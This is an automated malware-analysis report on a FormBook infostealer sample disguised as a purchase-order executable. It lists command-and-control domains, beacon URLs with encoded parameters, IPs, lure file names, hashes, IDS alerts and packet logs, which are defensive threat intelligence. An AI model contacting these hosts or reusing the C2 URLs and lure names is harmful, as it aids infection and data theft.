                          • www.tintasmaiscor.com/a42m/?AP00=BaBbynwG2FaMiw+hmoeFnG4PrZfHHbpnPsDfKOVNrs70A5vduIAG3AN1jPdCIStIA9EjWNWwwUOGmupZW6v0QrzsBcsVqVXvouqOWRe0ntuSf7iSy2xcb+U=&P6V=btjH
                          ENQUIRY OFFER.xlsGet hashmaliciousFormBookBrowse
                          • www.tintasmaiscor.com/a42m/
                          3mquY2sUcn.exeGet hashmaliciousFormBookBrowse
                          • www.tintasmaiscor.com/a42m/
                          Order Items.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • www.tintasmaiscor.com/a42m/
                          ITEMS.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                          • www.tintasmaiscor.com/a42m/
                          facturas y albaranes del mes de marzo y abril-pdf.exeGet hashmaliciousFormBookBrowse
                          • www.tavernadoheroi.store/8cuu/
                          RFQ-25251.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • www.aprovapapafox.com/aleu/?Fb=mEhw182mTcvL4X7W6yJhLslIcG+j3Kkb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5HrlDAC6es8J/4MGCSxvHU4H+D2Na9g==&Cvp=4jl0Z4R0O
                          RCoAOiAqk7.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • www.tintasmaiscor.com/a42m/
                          SecuriteInfo.com.Win64.PWSX-gen.13670.618.exeGet hashmaliciousFormBookBrowse
                          • www.tavernadoheroi.store/8cuu/
                          162.0.237.22EST- 250424-0370pdf.exeGet hashmaliciousFormBookBrowse
                          • www.deaybrid.info/kr6p/?SZ=HaJFZho8Nn16sg//6ib2nk7c2+vkBSZR2YpvIexP2qZw/StZPUfmsLsuuV/LBKRGJiaNBLxYMlLi0QylbMozyF2WOugBIyjyrBKtdaOSXYuxeu2j/WRDnQUVO3VI+uF6uQ==&KZS0W=rx6X7x9
                          Okthabah.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • www.falstru.xyz/z912/
                          Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • www.falstru.xyz/ntpp/
                          F2qfVHeuUh.exeGet hashmaliciousFormBookBrowse
                          • www.crimsoncascade.xyz/a42m/?AP00=OaCxij+az8CWZkVV4Z97hLXhpPYtYBvJsZdPmSHU0RFVoK/pLfrBJ2MjeSz+pAxrgiF9enqzkwmMWhrDz0ZQoeYZo+3MdHNHxcVQy6J8EXmdTI/Q3w31j8s=&P6V=btjH
                          Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                          • www.deaybrid.info/mcz6/
                          Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • www.falstru.xyz/ntpp/
                          3mquY2sUcn.exeGet hashmaliciousFormBookBrowse
                          • www.crimsoncascade.xyz/a42m/
                          Factura (3).exeGet hashmaliciousFormBookBrowse
                          • www.deaybrid.info/mcz6/
                          WaybillDoc_43948767.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • www.shevgin.top/gzu1/
                          JUSTIFICANTE DE PAGO 18903547820000.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • www.falstru.xyz/ntpp/

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          k2-ld.wakak1.shopF2qfVHeuUh.exeGet hashmaliciousFormBookBrowse
                          • 154.39.248.133
                          3mquY2sUcn.exeGet hashmaliciousFormBookBrowse
                          • 154.39.248.133
                          Order Items.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 154.39.248.133
                          RCoAOiAqk7.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 154.55.135.138
                          MBL Draft-Shipment Documents.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 154.39.248.133
                          ai1qjpaw6l.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 154.55.135.138
                          Order List.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 154.39.248.133
                          Payment Advice MT1034354.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 154.55.135.138
                          cuenta para pago1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 154.39.248.133
                          rcuentaparapago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 154.55.135.138
                          www.6whebx.cyouF2qfVHeuUh.exeGet hashmaliciousFormBookBrowse
                          • 192.74.233.3
                          3mquY2sUcn.exeGet hashmaliciousFormBookBrowse
                          • 192.74.233.8
                          MBL Draft-Shipment Documents.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 192.74.233.8
                          ai1qjpaw6l.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 192.74.233.8
                          Order List.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 192.74.233.8
                          Payment Advice MT1034354.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 192.74.233.8
                          pYeAlZOjQA.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 192.74.233.8
                          Catalyzers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 192.74.233.8

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          NAMECHEAP-NETUShttps://g84qffhbb.cc.rs6.net/tn.jsp?f=001vOSSOENWSS4200uPNQEHjSDew4NbMuiPEfXAZZvLVpSmWUMPp8xPA1aAMxaun3grFaJ03lpVQAq0CnwEItgBCJ96l3XkhNonHD4qdyLoQ9nfNBhndHEDOsc5Zhc0NCidtDQvd1XijlCuZzhEm_iedfFzIAxsfdBF&c=&ch=Get hashmaliciousUnknownBrowse
                          • 198.187.31.57
                          UTHyAUOVPD.elfGet hashmaliciousMiraiBrowse
                          • 198.54.114.149
                          Zam#U00f3w nr 90016288247_ ZNG_1406_MG_2024_004782922.pdf.exeGet hashmaliciousAgentTeslaBrowse
                          • 198.54.122.135
                          SecuriteInfo.com.Trojan.DownLoad3.33216.13863.20878.exeGet hashmaliciousUnknownBrowse
                          • 198.54.115.45
                          file.exeGet hashmaliciousCMSBruteBrowse
                          • 198.187.29.4
                          hesaphareketi_1.exeGet hashmaliciousAgentTeslaBrowse
                          • 198.54.114.199
                          Hesap hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                          • 198.54.114.199
                          5302c416b0abd845fe3145f910e82440588c11219940fe89fd68722260a9b508_payload.exeGet hashmaliciousAgentTeslaBrowse
                          • 198.54.122.135
                          EST- 250424-0370pdf.exeGet hashmaliciousFormBookBrowse
                          • 162.0.237.22
                          SecuriteInfo.com.Win64.PWSX-gen.16698.32595.exeGet hashmaliciousAgentTeslaBrowse
                          • 198.54.122.135
                          PEGTECHINCUShCNsvwoPS6.elfGet hashmaliciousUnknownBrowse
                          • 45.205.88.132
                          F2qfVHeuUh.exeGet hashmaliciousFormBookBrowse
                          • 192.74.233.3
                          la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                          • 165.3.147.177
                          sutep#U5b89#U88c5#U67e5#U770bJ.exeGet hashmaliciousBlackMoonBrowse
                          • 107.148.63.166
                          SecuriteInfo.com.PUA.RiskWare.Youxun.22766.22244.exeGet hashmaliciousUnknownBrowse
                          • 107.149.94.22
                          3mquY2sUcn.exeGet hashmaliciousFormBookBrowse
                          • 192.74.233.8
                          L7WxAhwd3D.elfGet hashmaliciousMiraiBrowse
                          • 154.195.146.223
                          KlDqtLWXHA.elfGet hashmaliciousMiraiBrowse
                          • 154.88.173.239
                          ZAM#U00d3WIENIE_NR.2405073.exeGet hashmaliciousDBatLoader, FormBookBrowse
                          • 108.186.8.155
                          2WCeeBqjrr.elfGet hashmaliciousMiraiBrowse
                          • 156.247.76.156
                          UNIFIEDLAYER-AS-1USPO_23052024.exeGet hashmaliciousAgentTeslaBrowse
                          • 192.185.143.105
                          http://chocolatefashiononline.comGet hashmaliciousUnknownBrowse
                          • 192.185.181.216
                          ELECTRONIC RECEIPT_Rockwool.htmlGet hashmaliciousUnknownBrowse
                          • 162.240.231.208
                          yzKJORP7Q4.elfGet hashmaliciousMirai, MoobotBrowse
                          • 142.7.14.96
                          4rg5Y5MHO8.elfGet hashmaliciousMirai, MoobotBrowse
                          • 142.7.14.96
                          w5c8CHID77.exeGet hashmaliciousUnknownBrowse
                          • 74.220.199.6
                          SecuriteInfo.com.Trojan.DownLoad3.33216.13863.20878.exeGet hashmaliciousUnknownBrowse
                          • 192.254.232.193
                          https://wrt.dvw.mybluehost.me/CH/SBB/index/Get hashmaliciousUnknownBrowse
                          • 162.241.225.162
                          DHL INVOICE.scr.exeGet hashmaliciousAgentTeslaBrowse
                          • 162.214.80.31
                          file.exeGet hashmaliciousCMSBruteBrowse
                          • 162.215.2.27
                          RUMAHWEB-AS-IDRumahwebIndonesiaCVIDF2qfVHeuUh.exeGet hashmaliciousFormBookBrowse
                          • 103.247.10.164
                          ENQUIRY OFFER.xlsGet hashmaliciousFormBookBrowse
                          • 103.247.10.164
                          Pedido de compra urgente.exeGet hashmaliciousFormBookBrowse
                          • 103.247.11.116
                          3mquY2sUcn.exeGet hashmaliciousFormBookBrowse
                          • 103.247.10.164
                          Enquiry List.xlsGet hashmaliciousFormBookBrowse
                          • 103.247.10.164
                          LCS-155-44 01_General_Purchase_Order_Terms_and_Conditions.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                          • 103.247.11.105
                          LCS-155-44 01_General_Purchase_Order_Terms_and_Conditions.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                          • 103.247.11.105
                          LCS-155-44 01_General_Purchase_Order_Terms_and_Conditions.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                          • 103.247.11.105
                          Order Items.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 103.247.10.164
                          ITEMS.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 103.247.10.164

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO Copy_7854569.exe.log

                          Download File
                          Process:C:\Users\user\Desktop\PO Copy_7854569.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1216
                          Entropy (8bit):5.34331486778365
                          Encrypted:false
                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1172
                          Entropy (8bit):5.354777075714867
                          Encrypted:false
                          SSDEEP:24:3gWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:QWSU4y4RQmFoUeWmfmZ9tK8NDE
                          MD5:92C17FC0DE8449D1E50ED56DBEBAA35D
                          SHA1:A617D392757DC7B1BEF28448B72CBD131CF4D0FB
                          SHA-256:DA2D2B57AFF1C99E62DD8102CF4DB3F2F0621D687D275BFAF3DB77772131E485
                          SHA-512:603922B790E772A480C9BF4CFD621827085B0070131EF29DC283F0E901CF783034384F8815C092D79A6EA5DF382EF78AF5AC3D81EBD118D2D5C1E623CE5553D1
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                          C:\Users\user\AppData\Local\Temp\HH-71hzM

                          Download File
                          Process:C:\Windows\SysWOW64\openfiles.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                          Category:dropped
                          Size (bytes):196608
                          Entropy (8bit):1.121297215059106
                          Encrypted:false
                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                          MD5:D87270D0039ED3A5A72E7082EA71E305
                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c4yycnsf.aqw.psm1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ckr1lotl.uif.ps1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbsyqs0r.n3f.ps1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ka1khkkz.gxq.psm1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.957781744980178
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          File name:PO Copy_7854569.exe
                          File size:715'264 bytes
                          MD5:1a446464ce98784973a5e7bd13190a5b
                          SHA1:d4a5f07d3259338ec8ac7c84dc387dd0ea581b6b
                          SHA256:dcda4d5b1eba2327c178aad5f4237e22934841cd6d7ad116c2cb1622d6e9673b
                          SHA512:cb39b7dbcac0f6d1319ea70a589add07be9f2911e255dc21bb8364dfd36143283c8dacc444515ad0184d5bba2cdb37180d4325f57d7fa90060620292b0824783
                          SSDEEP:12288:e5dxtiqsXrn+yqXRYhJ6rRz4NxufdfwVfZohEViROrEn1FMG:e5pbsXrnowHdZohEAKED
                          TLSH:7EE4231AB3B594B3CC3E9BB904754276937269933733FA496EC900FA1CE3709CA44997
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Mf................................. ........@.. .......................@............@................................

                          File Icon

                          Icon Hash:c04e363636261032

                          Static PE Info

                          General

                          Entrypoint:0x4af51e
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x664DBAB3 [Wed May 22 09:28:19 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                          Entrypoint Preview

                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xaf4c40x57.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x1000.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000xad5240xad600facc1187ad79d0ac35824244416c2a38False0.9701173283165104data7.965905089311066IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0xb00000x10000x10005a6f5f7dd7810df3a932b753842f66ceFalse0.64794921875data5.905399762407496IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0xb20000xc0x200bfdcfd61ea2ceb2b5a0981427b1985b7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0xb01000x7f0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9281496062992126
                          RT_GROUP_ICON0xb09000x14data1.05
                          RT_VERSION0xb09240x344data0.4342105263157895
                          RT_MANIFEST0xb0c780x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                          Imports

                          DLLImport
                          mscoree.dll_CorExeMain

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          05/23/24-15:17:32.170290TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25366180192.168.2.5162.0.237.22
                          05/23/24-15:16:50.015697TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25365280192.168.2.5103.247.10.164
                          05/23/24-15:17:18.761145TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25365780192.168.2.5162.240.81.18
                          05/23/24-15:17:46.447712TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25366580192.168.2.584.32.84.32
                          05/23/24-15:17:10.469533TCP2856318ETPRO TROJAN FormBook CnC Checkin (POST) M45365480192.168.2.5162.240.81.18

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          May 23, 2024 15:16:49.959688902 CEST5365280192.168.2.5103.247.10.164
                          May 23, 2024 15:16:50.012980938 CEST8053652103.247.10.164192.168.2.5
                          May 23, 2024 15:16:50.013078928 CEST5365280192.168.2.5103.247.10.164
                          May 23, 2024 15:16:50.015697002 CEST5365280192.168.2.5103.247.10.164
                          May 23, 2024 15:16:50.022702932 CEST8053652103.247.10.164192.168.2.5
                          May 23, 2024 15:16:51.268683910 CEST8053652103.247.10.164192.168.2.5
                          May 23, 2024 15:16:51.274008036 CEST8053652103.247.10.164192.168.2.5
                          May 23, 2024 15:16:51.274046898 CEST8053652103.247.10.164192.168.2.5
                          May 23, 2024 15:16:51.274132967 CEST5365280192.168.2.5103.247.10.164
                          May 23, 2024 15:16:51.274494886 CEST5365280192.168.2.5103.247.10.164
                          May 23, 2024 15:16:51.276926994 CEST5365280192.168.2.5103.247.10.164
                          May 23, 2024 15:16:51.284329891 CEST8053652103.247.10.164192.168.2.5
                          May 23, 2024 15:17:10.407160997 CEST5365480192.168.2.5162.240.81.18
                          May 23, 2024 15:17:10.460072994 CEST8053654162.240.81.18192.168.2.5
                          May 23, 2024 15:17:10.460211992 CEST5365480192.168.2.5162.240.81.18
                          May 23, 2024 15:17:10.469532967 CEST5365480192.168.2.5162.240.81.18
                          May 23, 2024 15:17:10.474699020 CEST8053654162.240.81.18192.168.2.5
                          May 23, 2024 15:17:11.082813025 CEST8053654162.240.81.18192.168.2.5
                          May 23, 2024 15:17:11.086544991 CEST8053654162.240.81.18192.168.2.5
                          May 23, 2024 15:17:11.086611986 CEST5365480192.168.2.5162.240.81.18
                          May 23, 2024 15:17:11.090539932 CEST8053654162.240.81.18192.168.2.5
                          May 23, 2024 15:17:11.090557098 CEST8053654162.240.81.18192.168.2.5
                          May 23, 2024 15:17:11.090572119 CEST8053654162.240.81.18192.168.2.5
                          May 23, 2024 15:17:11.090611935 CEST5365480192.168.2.5162.240.81.18
                          May 23, 2024 15:17:11.090631962 CEST5365480192.168.2.5162.240.81.18
                          May 23, 2024 15:17:11.983972073 CEST5365480192.168.2.5162.240.81.18
                          May 23, 2024 15:17:13.030036926 CEST5365580192.168.2.5162.240.81.18
                          May 23, 2024 15:17:13.035190105 CEST8053655162.240.81.18192.168.2.5
                          May 23, 2024 15:17:13.035322905 CEST5365580192.168.2.5162.240.81.18
                          May 23, 2024 15:17:13.037537098 CEST5365580192.168.2.5162.240.81.18
                          May 23, 2024 15:17:13.088749886 CEST8053655162.240.81.18192.168.2.5
                          May 23, 2024 15:17:13.611696959 CEST8053655162.240.81.18192.168.2.5
                          May 23, 2024 15:17:13.612622976 CEST8053655162.240.81.18192.168.2.5
                          May 23, 2024 15:17:13.612680912 CEST5365580192.168.2.5162.240.81.18
                          May 23, 2024 15:17:13.617400885 CEST8053655162.240.81.18192.168.2.5
                          May 23, 2024 15:17:13.617435932 CEST8053655162.240.81.18192.168.2.5
                          May 23, 2024 15:17:13.617469072 CEST8053655162.240.81.18192.168.2.5
                          May 23, 2024 15:17:13.617527962 CEST5365580192.168.2.5162.240.81.18
